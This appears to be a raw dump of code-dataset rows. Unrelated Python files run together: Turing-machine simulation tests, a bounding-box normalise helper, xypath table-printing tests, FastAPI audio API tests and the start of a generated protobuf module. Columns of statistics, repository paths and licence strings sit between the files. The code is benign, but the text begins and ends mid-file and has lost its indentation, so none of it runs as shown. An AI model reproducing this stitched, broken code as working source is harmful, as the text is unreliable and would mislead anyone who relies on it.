[(0, 3)], [(1, 4)], [(1, 5)], [(2, 6)], [(2, 7)], [(3, 6)], [(3, 5)], [(3, 4)], [(3, 3)],
[(0, 4)], [(4, 3)], [(4, 2)], [(4, 1)], [(5, 2)], [(5, 3)], [(5, 4)], [(5, 5)], [(5, 6)],
[(5, 7)], [(5, 8)], [(6, 8)]]
activities = ntm.get_activities_over_time_as_list(trajectory)
np.testing.assert_equal(expected_activities, activities)
expected_tape_history = self._convert_to_list_of_lists("turing_machine1b-tape.ca")
np.testing.assert_equal(expected_tape_history, tape_history)
expected_head_activities = self._convert_to_list_of_lists("turing_machine1b-head.ca", strings=True)
np.testing.assert_equal(expected_head_activities, head_activities)
def test_turing_machine1c(self):
HEAD = {"up": 1, "down": 2}
CELL = {"a": 0, "b": 1, "c": 2, "d": 3, "e": 4}
rule_table = {
HEAD['up']: {
CELL['a']: [HEAD['up'], CELL['b'], TuringMachine.LEFT],
CELL['b']: [HEAD['up'], CELL['a'], TuringMachine.RIGHT],
CELL['c']: [HEAD['up'], CELL['a'], TuringMachine.RIGHT],
CELL['d']: [HEAD['down'], CELL['e'], TuringMachine.RIGHT],
CELL['e']: [HEAD['down'], CELL['d'], TuringMachine.LEFT]
},
HEAD['down']: {
CELL['a']: [HEAD['up'], CELL['d'], TuringMachine.LEFT],
CELL['b']: [HEAD['up'], CELL['a'], TuringMachine.RIGHT],
CELL['c']: [HEAD['up'], CELL['e'], TuringMachine.RIGHT],
CELL['d']: [HEAD['down'], CELL['e'], TuringMachine.RIGHT],
CELL['e']: [HEAD['down'], CELL['c'], TuringMachine.LEFT]
}
}
tape = "bbbbbbaeaaaaaaa"
tm = HeadCentricTuringMachine(tape=[CELL[t] for t in tape], rule_table=rule_table,
initial_head_state=HEAD['up'], initial_head_position=8, max_timesteps=58)
trajectory = ntm.evolve(initial_conditions=tm.initial_conditions, network=tm.network,
activity_rule=tm.activity_rule, input=tm.input_function)
tape_history, head_activities = tm.activities_for_plotting(trajectory)
expected_activities = [[(1, 8)], [(1, 7)], [(2, 6)], [(1, 5)], [(1, 6)], [(2, 7)], [(2, 8)], [(1, 9)], [(1, 8)],
[(1, 7)], [(2, 6)], [(2, 5)], [(1, 4)], [(1, 5)], [(2, 6)], [(1, 7)], [(2, 8)], [(1, 9)],
[(1, 10)], [(1, 9)], [(1, 8)], [(1, 7)], [(2, 6)], [(2, 5)], [(2, 4)], [(1, 3)], [(1, 4)],
[(2, 5)], [(1, 6)], [(1, 7)], [(2, 8)], [(1, 9)], [(1, 10)], [(1, 11)], [(1, 10)], [(1, 9)],
[(1, 8)], [(1, 7)], [(2, 6)], [(1, 5)], [(2, 4)], [(2, 3)], [(1, 2)], [(1, 3)], [(2, 4)],
[(1, 5)], [(2, 6)], [(2, 7)], [(2, 8)], [(1, 9)], [(1, 10)], [(1, 11)], [(1, 12)],
[(1, 11)], [(1, 10)], [(1, 9)], [(1, 8)], [(1, 7)]]
activities = ntm.get_activities_over_time_as_list(trajectory)
np.testing.assert_equal(expected_activities, activities)
expected_tape_history = self._convert_to_list_of_lists("turing_machine1c-tape.ca")
np.testing.assert_equal(expected_tape_history, tape_history)
expected_head_activities = self._convert_to_list_of_lists("turing_machine1c-head.ca", strings=True)
np.testing.assert_equal(expected_head_activities, head_activities)
def test_turing_machine2(self):
HEAD = {"up": 1, "down": 2}
CELL = {"on": 1, "off": 0}
rule_table = {
HEAD['up']: {
CELL['on']: [HEAD['up'], CELL['off'], TuringMachine.RIGHT],
CELL['off']: [HEAD['down'], CELL['on'], TuringMachine.RIGHT]
},
HEAD['down']: {
CELL['on']: [HEAD['up'], CELL['on'], TuringMachine.LEFT],
CELL['off']: [HEAD['down'], CELL['on'], TuringMachine.LEFT]
}
}
tm = TapeCentricTuringMachine(n=21, rule_table=rule_table,
initial_head_state=HEAD['up'], initial_head_position=3)
initial_conditions = [0] * 21
trajectory = ntm.evolve(initial_conditions=initial_conditions, network=tm.network,
activity_rule=tm.activity_rule, timesteps=61)
head_activities = tm.head_activities(trajectory)
expected_activities = self._convert_to_list_of_lists("turing_machine2.ca")
activities = ntm.get_activities_over_time_as_list(trajectory)
np.testing.assert_equal(expected_activities, activities)
expected_head_activities = self._convert_to_list_of_lists("turing_machine2-head.ca", strings=True)
np.testing.assert_equal(expected_head_activities, head_activities)
def test_turing_machine2b(self):
HEAD = {"q0": 0, "q1": 1, "q2": 2, "q3": 3, "q4": 4, "q5": 5, "q6": 6}
CELL = {" ": 0, "a": 1, "b": 2, "c": 3, "x": 4, "y": 5, "z": 6}
rule_table = {
HEAD['q0']: {
CELL['a']: [HEAD['q1'], CELL['x'], TuringMachine.RIGHT],
CELL[' ']: [HEAD['q6'], CELL[' '], TuringMachine.STAY],
CELL['y']: [HEAD['q4'], CELL['y'], TuringMachine.LEFT],
CELL['b']: [HEAD['q0'], CELL['b'], TuringMachine.STAY],
CELL['c']: [HEAD['q0'], CELL['c'], TuringMachine.STAY],
CELL['x']: [HEAD['q0'], CELL['x'], TuringMachine.STAY],
CELL['z']: [HEAD['q0'], CELL['z'], TuringMachine.STAY],
},
HEAD['q1']: {
CELL['b']: [HEAD['q2'], CELL['y'], TuringMachine.RIGHT],
CELL['y']: [HEAD['q1'], CELL['y'], TuringMachine.RIGHT],
CELL['a']: [HEAD['q1'], CELL['a'], TuringMachine.RIGHT],
CELL['c']: [HEAD['q1'], CELL['c'], TuringMachine.STAY],
CELL['x']: [HEAD['q1'], CELL['x'], TuringMachine.STAY],
CELL['z']: [HEAD['q1'], CELL['z'], TuringMachine.STAY],
CELL[' ']: [HEAD['q1'], CELL[' '], TuringMachine.STAY],
},
HEAD['q2']: {
CELL['c']: [HEAD['q3'], CELL['z'], TuringMachine.LEFT],
CELL['z']: [HEAD['q2'], CELL['z'], TuringMachine.RIGHT],
CELL['b']: [HEAD['q2'], CELL['b'], TuringMachine.RIGHT],
CELL['a']: [HEAD['q2'], CELL['a'], TuringMachine.STAY],
CELL['x']: [HEAD['q2'], CELL['x'], TuringMachine.STAY],
CELL['y']: [HEAD['q2'], CELL['y'], TuringMachine.STAY],
CELL[' ']: [HEAD['q2'], CELL[' '], TuringMachine.STAY],
},
HEAD['q3']: {
CELL['x']: [HEAD['q0'], CELL['x'], TuringMachine.RIGHT],
CELL['a']: [HEAD['q3'], CELL['a'], TuringMachine.LEFT],
CELL['b']: [HEAD['q3'], CELL['b'], TuringMachine.LEFT],
CELL['z']: [HEAD['q3'], CELL['z'], TuringMachine.LEFT],
CELL['y']: [HEAD['q3'], CELL['y'], TuringMachine.LEFT],
CELL['c']: [HEAD['q3'], CELL['c'], TuringMachine.STAY],
CELL[' ']: [HEAD['q3'], CELL[' '], TuringMachine.STAY]
},
HEAD['q4']: {
CELL[' ']: [HEAD['q5'], CELL[' '], TuringMachine.RIGHT],
CELL['x']: [HEAD['q4'], CELL['x'], TuringMachine.LEFT],
CELL['a']: [HEAD['q4'], CELL['a'], TuringMachine.STAY],
CELL['b']: [HEAD['q4'], CELL['b'], TuringMachine.STAY],
CELL['c']: [HEAD['q4'], CELL['c'], TuringMachine.STAY],
CELL['y']: [HEAD['q4'], CELL['y'], TuringMachine.STAY],
CELL['z']: [HEAD['q4'], CELL['z'], TuringMachine.STAY]
},
HEAD['q5']: {
CELL[' ']: [HEAD['q6'], CELL[' '], TuringMachine.STAY],
CELL['x']: [HEAD['q5'], CELL['x'], TuringMachine.RIGHT],
CELL['y']: [HEAD['q5'], CELL['y'], TuringMachine.RIGHT],
CELL['z']: [HEAD['q5'], CELL['z'], TuringMachine.RIGHT],
CELL['a']: [HEAD['q5'], CELL['a'], TuringMachine.STAY],
CELL['b']: [HEAD['q5'], CELL['b'], TuringMachine.STAY],
CELL['c']: [HEAD['q5'], CELL['c'], TuringMachine.STAY]
},
HEAD['q6']: {
CELL[' ']: [HEAD['q6'], CELL[' '], TuringMachine.STAY],
CELL['a']: [HEAD['q6'], CELL['a'], TuringMachine.STAY],
CELL['b']: [HEAD['q6'], CELL['b'], TuringMachine.STAY],
CELL['c']: [HEAD['q6'], CELL['c'], TuringMachine.STAY],
CELL['x']: [HEAD['q6'], CELL['x'], TuringMachine.STAY],
CELL['y']: [HEAD['q6'], CELL['y'], TuringMachine.STAY],
CELL['z']: [HEAD['q6'], CELL['z'], TuringMachine.STAY]
}
}
tape = " aabbcc "
tm = TapeCentricTuringMachine(n=len(tape), rule_table=rule_table,
initial_head_state=HEAD['q0'], initial_head_position=2)
initial_conditions = [CELL[t] for t in tape]
trajectory = ntm.evolve(initial_conditions=initial_conditions, network=tm.network,
activity_rule=tm.activity_rule, timesteps=61)
head_activities = tm.head_activities(trajectory)
expected_activities = self._convert_to_list_of_lists("turing_machine2b.ca")
activities = ntm.get_activities_over_time_as_list(trajectory)
np.testing.assert_equal(expected_activities, activities)
expected_head_activities = self._convert_to_list_of_lists("turing_machine2b-head.ca", strings=True)
np.testing.assert_equal(expected_head_activities, head_activities)
def test_turing_machine2c(self):
HEAD = {"up": 1, "down": 2}
CELL = {"a": 0, "b": 1, "c": 2, "d": 3, "e": 4}
rule_table = {
HEAD['up']: {
CELL['a']: [HEAD['up'], CELL['b'], TuringMachine.LEFT],
CELL['b']: [HEAD['up'], CELL['a'], TuringMachine.RIGHT],
CELL['c']: [HEAD['up'], CELL['a'], TuringMachine.RIGHT],
CELL['d']: [HEAD['down'], CELL['e'], TuringMachine.RIGHT],
CELL['e']: [HEAD['down'], CELL['d'], TuringMachine.LEFT]
},
HEAD['down']: {
CELL['a']: [HEAD['up'], CELL['d'], TuringMachine.LEFT],
CELL['b']: [HEAD['up'], CELL['a'], TuringMachine.RIGHT],
CELL['c']: [HEAD['up'], CELL['e'], TuringMachine.RIGHT],
CELL['d']: [HEAD['down'], CELL['e'], TuringMachine.RIGHT],
CELL['e']: [HEAD['down'], CELL['c'], TuringMachine.LEFT]
}
}
tape = "bbbbbbaeaaaaaaa"
tm = TapeCentricTuringMachine(n=len(tape), rule_table=rule_table,
initial_head_state=HEAD['up'], initial_head_position=8)
initial_conditions = [CELL[t] for t in tape]
trajectory = ntm.evolve(initial_conditions=initial_conditions, network=tm.network,
activity_rule=tm.activity_rule, timesteps=58)
head_activities = tm.head_activities(trajectory)
expected_activities = self._convert_to_list_of_lists("turing_machine2c.ca")
activities = ntm.get_activities_over_time_as_list(trajectory)
np.testing.assert_equal(expected_activities, activities)
expected_head_activities = self._convert_to_list_of_lists("turing_machine2c-head.ca", strings=True)
np.testing.assert_equal(expected_head_activities, head_activities)
| 61.288026
| 123
| 0.486905
| 2,148
| 18,938
| 4.162011
| 0.051676
| 0.117897
| 0.112752
| 0.033557
| 0.946309
| 0.945526
| 0.940716
| 0.935235
| 0.925839
| 0.920022
| 0
| 0.041903
| 0.293062
| 18,938
| 308
| 124
| 61.487013
| 0.625859
| 0
| 0
| 0.727891
| 0
| 0
| 0.053913
| 0.011247
| 0
| 0
| 0
| 0
| 0.05102
| 1
| 0.020408
| false
| 0
| 0.010204
| 0
| 0.034014
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe386cfff450389a866b20311a82232a01ea11d1
| 282
|
py
|
Python
|
data/operator/bbox/spatial/normalize.py
|
zhangzhengde0225/SwinTrack
|
526be17f8ef266cb924c6939bd8dda23e9b73249
|
[
"MIT"
] | 143
|
2021-12-03T02:33:36.000Z
|
2022-03-29T00:01:48.000Z
|
data/operator/bbox/spatial/normalize.py
|
zhangzhengde0225/SwinTrack
|
526be17f8ef266cb924c6939bd8dda23e9b73249
|
[
"MIT"
] | 33
|
2021-12-03T10:32:05.000Z
|
2022-03-31T02:13:55.000Z
|
data/operator/bbox/spatial/normalize.py
|
zhangzhengde0225/SwinTrack
|
526be17f8ef266cb924c6939bd8dda23e9b73249
|
[
"MIT"
] | 24
|
2021-12-04T06:46:42.000Z
|
2022-03-30T07:57:47.000Z
|
def bbox_normalize(bbox, image_size):
return tuple(v / image_size[0] if i % 2 == 0 else v / image_size[1] for i, v in enumerate(bbox))
def bbox_denormalize(bbox, image_size):
return tuple(v * image_size[0] if i % 2 == 0 else v * image_size[1] for i, v in enumerate(bbox))
| 40.285714
| 100
| 0.680851
| 54
| 282
| 3.407407
| 0.333333
| 0.293478
| 0.217391
| 0.206522
| 0.815217
| 0.815217
| 0.815217
| 0.815217
| 0.815217
| 0.815217
| 0
| 0.035088
| 0.191489
| 282
| 6
| 101
| 47
| 0.77193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 13
|
22980b89ef09f9aad8d7b614611af3bbb6db5e3b
| 6,864
|
py
|
Python
|
test/test_pprint.py
|
mikeAdamss/xypath
|
688aedc59794c4e18ed65335c83df35e3417be24
|
[
"BSD-2-Clause"
] | 16
|
2017-03-02T13:47:16.000Z
|
2021-11-19T21:43:26.000Z
|
test/test_pprint.py
|
mikeAdamss/xypath
|
688aedc59794c4e18ed65335c83df35e3417be24
|
[
"BSD-2-Clause"
] | 17
|
2015-01-09T16:03:43.000Z
|
2016-09-26T11:09:00.000Z
|
test/test_pprint.py
|
mikeAdamss/xypath
|
688aedc59794c4e18ed65335c83df35e3417be24
|
[
"BSD-2-Clause"
] | 4
|
2015-04-23T00:10:44.000Z
|
2016-06-13T07:42:56.000Z
|
from __future__ import absolute_import
import tcore
import xypath
from textwrap import dedent
from io import StringIO
class TestPPrint(tcore.TCore):
def test_pprint(self):
"""
test_pprint: basic check of pprint output against hard-coded string
"""
EXPECTED_TABLE = dedent('''
/ C
--- -------------------------
274 American Samoa
275 Cook Islands
276 French Polynesia
277 Niue
278 Samoa
279 Tokelau
280 Tonga
281 Tuvalu
282 Wallis and Futuna Islands
''').lstrip('\n')
cells = self.table.filter('Polynesia').fill(xypath.DOWN)
stream = StringIO()
cells.pprint(stream=stream)
self.assertEqual(EXPECTED_TABLE, stream.getvalue())
def test_pprint_removed_cell(self):
"""
test_pprint_removed_cell: check that pprint's output is rectangular
"""
EXPECTED_TABLE = dedent('''
/ C
--- -------------------------
274 American Samoa
275 Cook Islands
276 French Polynesia
277 Niue
278 Samoa
279 Tokelau
280 /
281 Tuvalu
282 Wallis and Futuna Islands
''').lstrip('\n')
cells = self.table.filter('Polynesia').fill(xypath.DOWN)
cells_without_tonga = cells - cells.filter('Tonga')
stream = StringIO()
cells_without_tonga.pprint(stream=stream)
self.assertEqual(EXPECTED_TABLE, stream.getvalue())
def test_pprint_removed_cell_collapsed(self):
"""
test_pprint_removed_cell_collapsed: check that a collapsed row works
"""
EXPECTED_TABLE = dedent('''
/ C
--- -------------------------
274 American Samoa
275 Cook Islands
276 French Polynesia
277 Niue
278 Samoa
279 Tokelau
281 Tuvalu
282 Wallis and Futuna Islands
''').lstrip('\n')
cells = self.table.filter('Polynesia').fill(xypath.DOWN)
cells_without_tonga = cells - cells.filter('Tonga')
stream = StringIO()
cells_without_tonga.pprint(collapse_empty=True, stream=stream)
self.assertEqual(EXPECTED_TABLE, stream.getvalue())
def test_extrude(self):
"""
test_extrude: check 2-to-the-left extrusion against hard-coded string
"""
EXPECTED_TABLE = dedent('''
/ C D E
--- ------------------------- --- ---
274 American Samoa 16
275 Cook Islands 184
276 French Polynesia 258
277 Niue 570
278 Samoa 882
279 Tokelau 772
280 Tonga 776
281 Tuvalu 798
282 Wallis and Futuna Islands 876
''').lstrip('\n')
# Below the word "Polynesia", there are a set of islands
cells = self.table.filter('Polynesia').fill(xypath.DOWN)
# Right of this column, there is an empty column followed by numbers.
cells = cells.extrude(2, 0)
stream = StringIO()
cells.pprint(stream=stream)
self.assertEqual(EXPECTED_TABLE, stream.getvalue())
def test_extrude_negative(self):
"""
test_extrude_negative: check negative extrusion
"""
EXPECTED_TABLE = dedent('''
/ C D E
--- ------- --- ---
279 Tokelau 772
280 Tonga 776
281 Tuvalu 798
''').lstrip("\n")
cells = self.table.filter('Tuvalu').shift(2,0)
cells = cells.extrude(-2, -2)
stream = StringIO()
cells.pprint(stream=stream)
self.assertEqual(EXPECTED_TABLE, stream.getvalue())
def test_pprint_collapsed_column(self):
"""
test_pprint_collapsed_column: check empty column removal
"""
# Column D is removed because it contains no itmes with bool(x) == True
EXPECTED_TABLE = dedent('''
/ C E
--- ------------------------- ---
274 American Samoa 16
275 Cook Islands 184
276 French Polynesia 258
277 Niue 570
278 Samoa 882
279 Tokelau 772
280 Tonga 776
281 Tuvalu 798
282 Wallis and Futuna Islands 876
''').lstrip('\n')
# Below the word "Polynesia", there are a set of islands
cells = self.table.filter('Polynesia').assert_one().fill(xypath.DOWN)
# Right of this column, there is an empty column followed by numbers.
cells = cells.extrude(2, 0)
stream = StringIO()
# Collapse empty removes the empty column
cells.pprint(collapse_empty=True, stream=stream)
self.assertEqual(EXPECTED_TABLE, stream.getvalue())
def test_pprint_collapsed_column_and_row(self):
"""
test_pprint_collapsed_column_and_row: check row/column removal
"""
# Column D is removed because it contains no itmes with bool(x) == True
EXPECTED_TABLE = dedent('''
/ C E
--- ------------------------- ---
274 American Samoa 16
275 Cook Islands 184
276 French Polynesia 258
277 Niue 570
278 Samoa 882
279 Tokelau 772
281 Tuvalu 798
282 Wallis and Futuna Islands 876
''').lstrip('\n')
# Below the word "Polynesia", there are a set of islands
cells = self.table.filter('Polynesia').assert_one().fill(xypath.DOWN)
# Right of this column, there is an empty column followed by numbers.
cells = cells.extrude(2, 0)
tonga = cells.filter("Tonga")
# Remove cells in the same row as tonga
cells -= cells.same_row(tonga)
stream = StringIO()
# Collapse empty removes the empty column
cells.pprint(collapse_empty=True, stream=stream)
self.assertEqual(EXPECTED_TABLE, stream.getvalue())
| 34.666667
| 79
| 0.488782
| 664
| 6,864
| 4.945783
| 0.180723
| 0.05542
| 0.040499
| 0.042631
| 0.861449
| 0.830694
| 0.804202
| 0.804202
| 0.784714
| 0.773752
| 0
| 0.064789
| 0.415355
| 6,864
| 197
| 80
| 34.84264
| 0.753551
| 0.155886
| 0
| 0.818182
| 0
| 0
| 0.523835
| 0.026681
| 0
| 0
| 0
| 0
| 0.068182
| 1
| 0.05303
| false
| 0
| 0.037879
| 0
| 0.098485
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22cb8a34c105ce9788f463bc957d843b02359595
| 6,037
|
py
|
Python
|
test/main_test.py
|
PawanRamaMali/audiojack-api
|
0e4c53718a7ba228e1d2715396806569fba77f5e
|
[
"MIT"
] | null | null | null |
test/main_test.py
|
PawanRamaMali/audiojack-api
|
0e4c53718a7ba228e1d2715396806569fba77f5e
|
[
"MIT"
] | null | null | null |
test/main_test.py
|
PawanRamaMali/audiojack-api
|
0e4c53718a7ba228e1d2715396806569fba77f5e
|
[
"MIT"
] | null | null | null |
from fastapi.testclient import TestClient
from main import app
import logging
client = TestClient(app)
# ------------------ Tests for Songs -------------------------- #
def test_get_song_nonexisting():
response = client.get("/get/Song/1")
assert response.status_code == 400
def test_delete_song_nonexisting():
response = client.get("/delete/Song/1")
assert response.status_code == 400
def test_update_song_nonexisting():
response = client.post("/update/Song/1",
json={
"name": "Levitating",
"uploadTime": "2022-04-03T22:47:00.028Z",
"duration": 1243,
})
assert response.status_code == 400
def test_create_song():
response = client.post(
"/create?audioId=1&audioFileType=Song",
json={
"name": "Makeba",
"uploadTime": "2022-04-03T22:47:00.028Z",
"duration": 2121,
},
)
assert response.status_code == 200
assert response.json() == {
"msg": "Success",
"audioId": 1,
"audioFileType": "Song",
}
def test_get_song_existing():
response = client.get("/get/Song/1")
assert response.status_code == 200
assert response.json() == {
"name": "Makeba",
"uploadTime": "2022-04-03T22:47:00.028000",
"duration": 2121,
"audioFileType": "Song",
"audioId": 1
}
def test_get_all_song_existing():
response = client.get("/get/Song")
assert response.status_code == 200
assert response.json() == [{
"name": "Makeba",
"uploadTime": "2022-04-03T22:47:00.028000",
"duration": 2121,
"audioFileType": "Song",
"audioId": 1
}]
def test_update_song_existing():
response = client.post("/update/Song/1",
json={
"name": "Levitating",
"uploadTime": "2022-04-03T22:47:00.028Z",
"duration": 1243,
})
assert response.status_code == 200
assert response.json() == {
"msg": "Success",
"audioId": 1,
"audioFileType": "Song",
}
def test_delete_song_existing():
response = client.get("/delete/Song/1")
assert response.status_code == 200
def test_large_song_name():
response = client.post(
"/create?audioId=1&audioFileType=Song",
json={
"name": "A"*101,
"uploadTime": "2022-04-03T22:47:00.028Z",
"duration": 2121,
},
)
assert response.status_code == 422
# ------------------ Tests for Podcast -------------------------- #
def test_get_podcast_nonexisting():
response = client.get("/get/Podcast/1")
assert response.status_code == 400
def test_delete_podcast_nonexisting():
response = client.get("/delete/Podcast/1")
assert response.status_code == 400
def test_update_podcast_nonexisting():
response = client.post("/update/Podcast/1",
json={
"name": "The Pale Blue Dot",
"uploadTime": "2022-04-03T22:47:00.028Z",
"duration": 72847,
"host": "Carl Sagan",
"participants": ["John", "Bob"]
})
assert response.status_code == 400
def test_create_podcast():
response = client.post(
"/create?audioId=1&audioFileType=Podcast",
json={
"name": "The Pale Blue Dot",
"uploadTime": "2022-04-03T22:47:00.028Z",
"duration": 72847,
"host": "Carl Sagan",
"participants": ["John", "Bob"]
},
)
assert response.status_code == 200
assert response.json() == {
"msg": "Success",
"audioId": 1,
"audioFileType": "Podcast",
}
def test_get_podcast_existing():
response = client.get("/get/Podcast/1")
assert response.status_code == 200
assert response.json() == {
"audioId": 1,
"audioFileType": "Podcast",
"name": "The Pale Blue Dot",
"uploadTime": "2022-04-03T22:47:00.028000",
"duration": 72847,
"host": "Carl Sagan",
"participants": ["John", "Bob"]
}
def test_update_podcast_existing():
response = client.post("/update/Podcast/1",
json={
"name": "Our Planet",
"uploadTime": "2022-04-03T22:47:00.028Z",
"duration": 32341,
"host": "David Attenborough",
"participants": ["Marie", "Alice"]
})
assert response.status_code == 200
assert response.json() == {
"msg": "Success",
"audioId": 1,
"audioFileType": "Podcast",
}
def test_delete_podcast_existing():
response = client.get("/delete/Podcast/1")
assert response.status_code == 200
def test_max_ten_participants():
response = client.post(
"/create?audioId=1&audioFileType=Podcast",
json={
"name": "ABC",
"uploadTime": "2022-04-03T22:47:00.028Z",
"duration": 72847,
"host": "AC",
"participants": ["John"]*12
},
)
assert response.status_code == 422
def test_participant_name_max_100_chars():
response = client.post(
"/create?audioId=1&audioFileType=Podcast",
json={
"name": "ABC",
"uploadTime": "2022-04-03T22:47:00.028Z",
"duration": 72847,
"host": "AC",
"participants": ["A"*102]*5
},
)
assert response.status_code == 422
def test_duration_must_be_positive():
response = client.post(
"/create?audioId=1&audioFileType=Podcast",
json={
"name": "ABC",
"uploadTime": "2022-04-03T22:47:00.028Z",
"duration": -1,
"host": "AC",
"participants": ["A"]
},
)
assert response.status_code == 422
| 27.193694
| 67
| 0.524267
| 597
| 6,037
| 5.170854
| 0.140704
| 0.117914
| 0.123097
| 0.147716
| 0.873988
| 0.810496
| 0.810496
| 0.772919
| 0.704244
| 0.674765
| 0
| 0.091834
| 0.316382
| 6,037
| 221
| 68
| 27.316742
| 0.656167
| 0.020871
| 0
| 0.702247
| 0
| 0
| 0.261518
| 0.09248
| 0
| 0
| 0
| 0
| 0.146067
| 1
| 0.106742
| false
| 0
| 0.016854
| 0
| 0.123596
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22d40707cdbead43c67ffceaf6c297449af5c883
| 150,217
|
py
|
Python
|
lang/python/github/com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1/generated_pb2.py
|
metaprov/modelaapi
|
64ab493dd73329196235e15776e5177c72281990
|
[
"Apache-2.0"
] | 5
|
2022-02-18T03:40:10.000Z
|
2022-03-01T16:11:24.000Z
|
lang/python/github/com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1/generated_pb2.py
|
metaprov/modelaapi
|
64ab493dd73329196235e15776e5177c72281990
|
[
"Apache-2.0"
] | 1
|
2022-01-07T19:59:25.000Z
|
2022-02-04T01:21:14.000Z
|
lang/python/github/com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1/generated_pb2.py
|
metaprov/modelaapi
|
64ab493dd73329196235e15776e5177c72281990
|
[
"Apache-2.0"
] | 1
|
2022-03-25T10:21:43.000Z
|
2022-03-25T10:21:43.000Z
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: github.com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1/generated.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from k8s.io.api.core.v1 import generated_pb2 as k8s_dot_io_dot_api_dot_core_dot_v1_dot_generated__pb2
from k8s.io.api.rbac.v1 import generated_pb2 as k8s_dot_io_dot_api_dot_rbac_dot_v1_dot_generated__pb2
from k8s.io.apimachinery.pkg.api.resource import generated_pb2 as k8s_dot_io_dot_apimachinery_dot_pkg_dot_api_dot_resource_dot_generated__pb2
from k8s.io.apimachinery.pkg.apis.meta.v1 import generated_pb2 as k8s_dot_io_dot_apimachinery_dot_pkg_dot_apis_dot_meta_dot_v1_dot_generated__pb2
from k8s.io.apimachinery.pkg.runtime import generated_pb2 as k8s_dot_io_dot_apimachinery_dot_pkg_dot_runtime_dot_generated__pb2
from k8s.io.apimachinery.pkg.runtime.schema import generated_pb2 as k8s_dot_io_dot_apimachinery_dot_pkg_dot_runtime_dot_schema_dot_generated__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='github.com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1/generated.proto',
package='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1',
syntax='proto2',
serialized_options=b'Z7github.com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\nGgithub.com/metaprov/modelaapi/pkg/apis/catalog/v1alpha1/generated.proto\x12\x37github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1\x1a\"k8s.io/api/core/v1/generated.proto\x1a\"k8s.io/api/rbac/v1/generated.proto\x1a\x34k8s.io/apimachinery/pkg/api/resource/generated.proto\x1a\x34k8s.io/apimachinery/pkg/apis/meta/v1/generated.proto\x1a/k8s.io/apimachinery/pkg/runtime/generated.proto\x1a\x36k8s.io/apimachinery/pkg/runtime/schema/generated.proto\"\xa5\x01\n\tAlgorithm\x12\x42\n\x08metadata\x18\x01 \x01(\x0b\x32\x30.k8s.io.apimachinery.pkg.apis.meta.v1.ObjectMeta\x12T\n\x04spec\x18\x02 \x01(\x0b\x32\x46.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.AlgorithmSpec\"\xa4\x01\n\rAlgorithmList\x12@\n\x08metadata\x18\x01 \x01(\x0b\x32..k8s.io.apimachinery.pkg.apis.meta.v1.ListMeta\x12Q\n\x05items\x18\x02 \x03(\x0b\x32\x42.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Algorithm\"\x98\x03\n\rAlgorithmSpec\x12\x15\n\rframeworkName\x18\x01 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\x02 \x01(\t\x12\x0b\n\x03url\x18\x03 \x01(\t\x12\x0c\n\x04task\x18\x04 \x01(\t\x12\x0e\n\x06sparse\x18\x05 \x01(\x08\x12`\n\x11integerParameters\x18\x06 \x03(\x0b\x32\x45.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.IntParameter\x12`\n\x0f\x66loatParameters\x18\x07 \x03(\x0b\x32G.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.FloatParameter\x12l\n\x15\x63\x61tegoricalParameters\x18\x08 \x03(\x0b\x32M.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CategoricalParameter\"I\n\x14\x43\x61tegoricalParameter\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x14\n\x0c\x64\x65\x66\x61ultValue\x18\x02 \x01(\t\x12\r\n\x05\x65nums\x18\x03 \x03(\t\"\xf3\x01\n\x05\x43loud\x12\x42\n\x08metadata\x18\x01 \x01(\x0b\x32\x30.k8s.io.apimachinery.pkg.apis.meta.v1.ObjectMeta\x12P\n\x04spec\x18\x02 \x01(\x0b\x32\x42.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudSpec\x12T\n\x06status\x18\x03 \x01(\x0b\x32\x44.github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.CloudStatus\"\x9c\x01\n\tCloudList\x12@\n\x08metadata\x18\x01 